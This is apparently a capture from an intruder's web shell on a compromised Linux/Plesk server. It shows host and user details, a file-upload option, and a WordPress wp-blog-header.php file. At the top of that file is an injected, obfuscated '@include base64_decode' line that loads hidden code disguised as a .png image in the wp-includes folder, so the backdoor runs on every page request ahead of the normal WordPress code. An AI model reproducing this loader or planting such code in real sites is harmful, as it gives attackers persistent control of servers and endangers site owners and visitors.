HEX
Server: Apache
System: Linux charming-tharp.85-214-77-183.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
User: was-logistics.com_j7jix1vn2c (10008)
PHP: 8.3.6
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/was-logistics.com/httpdocs/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL3dhcy1sb2dpc3RpY3MuY29tL2h0dHBkb2NzL3dwLWluY2x1ZGVzL2ltYWdlcy9tZWRpYS9hZmFiZWJiYmJmZi5wbmc=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}